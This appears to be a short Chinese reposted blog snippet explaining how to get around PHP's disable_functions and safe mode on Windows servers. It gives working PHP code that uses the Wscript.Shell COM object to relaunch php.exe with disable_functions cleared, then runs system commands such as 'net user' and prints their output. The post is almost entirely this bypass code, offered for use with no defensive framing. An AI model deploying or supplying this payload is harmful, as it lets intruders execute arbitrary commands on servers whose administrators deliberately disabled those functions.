php利用wsh突破函数禁用执行命令(安全模式同理)
浏览数:50 /
时间:2015年06月09日
php利用wsh突破函数禁用执行命令(安全模式同理)
前提。需要服务器支持wsh.并知道php安装目录
但是php利用wsh执行命令是没有asp的权限高的。
突破代码
<?php $cmd=‘net user‘; $path = ‘C:\\PHP\\php.exe‘; $cmd=‘-r "system(\‘‘.$cmd.‘\‘);" -d disable_functions = ‘; //重新定义disable_functions函数 $phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!"); $exec=$phpwsh->exec($path.‘ ‘.$cmd); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo "${stroutput}\n"; ?>
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。
